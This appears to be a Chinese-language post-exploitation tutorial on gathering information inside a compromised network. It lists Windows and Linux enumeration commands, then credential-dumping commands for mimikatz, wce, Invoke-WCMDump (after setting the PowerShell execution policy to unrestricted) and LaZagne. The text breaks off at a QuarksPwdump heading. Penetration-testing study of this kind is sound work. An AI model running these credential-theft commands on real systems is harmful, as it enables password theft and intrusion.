内网信息搜集

一、用户列表

windows:net user

    内网信息搜集_第1张图片

linux:vim /etc/passwd

    内网信息搜集_第2张图片

二、进程信息

windows:tasklist

    内网信息搜集_第3张图片

杀死某个进程:taskkill  /pid  pid号  /f

    

linux:ps aux

    内网信息搜集_第4张图片

 top

    内网信息搜集_第5张图片

三、服务类别

windows:net start

    内网信息搜集_第6张图片

linux:chkconfig --list

    内网信息搜集_第7张图片

 service --status-all

    内网信息搜集_第8张图片

四、端口列表

windows:netstat -ano

    内网信息搜集_第9张图片

linux:查看所有得tcp端口:netstat -anpt

    内网信息搜集_第10张图片

查看所有得tcp和udp端口:netstat -anptu

    内网信息搜集_第11张图片

查看所有得开放端口:netstat -anptul

    内网信息搜集_第12张图片

五、补丁列表

wndows:systeminfo

    内网信息搜集_第13张图片内网信息搜集_第14张图片

  查看补丁的详细信息:wmic qfe list full

    内网信息搜集_第15张图片

linux:查看系统内核:uname -a

    

查看具体程序的补丁情况:rpm -qa | grep ssh

    内网信息搜集_第16张图片

六、本机共享 

windows:net share

  内网信息搜集_第17张图片

七、本地用户习惯

windows:可查看用户的家目录,比如以下文件

   内网信息搜集_第18张图片

八、当前用户密码(这里的密码不止登陆密码,还有用户登录 一些网址的密码)

window:

1.mimikatz(在win2008服务器上)

输入:

mimikatz.exe privilege::debug 
sekurlsa::logonpasswords

  内网信息搜集_第19张图片内网信息搜集_第20张图片

2.wce

wce.exe -l    列出密码和凭证

  内网信息搜集_第21张图片

 wce -lv  读取sam文件的密码

内网信息搜集_第22张图片

 3.lvoke-WCMDump

上传该脚本到win8服务器,利用win8自带得powershell,获取凭证用户名和密码

(1)修改策略为可加载 脚本

Set-ExecutionPolicy unrestricted

  内网信息搜集_第23张图片

(2)加载Invoke-WCMDump脚本

Import-Module .\Invoke-WCMDump.ps1

  

(3)输入脚本名Ivoke-WCMDump运行

  内网信息搜集_第24张图片

4.LaZagne

LaZagne是一款用于检索大量存储在本地计算机密码的开源应用程序。 因为每个软件储存密码的方式不尽相同(明文、API、定制算法、数据库等),所以该工具使用多种方法获取软件密码

lazagne.exe all 查看所有

内网信息搜集_第25张图片

 5.QuarksPwdump

 

 

 

你可能感兴趣的:(后渗透)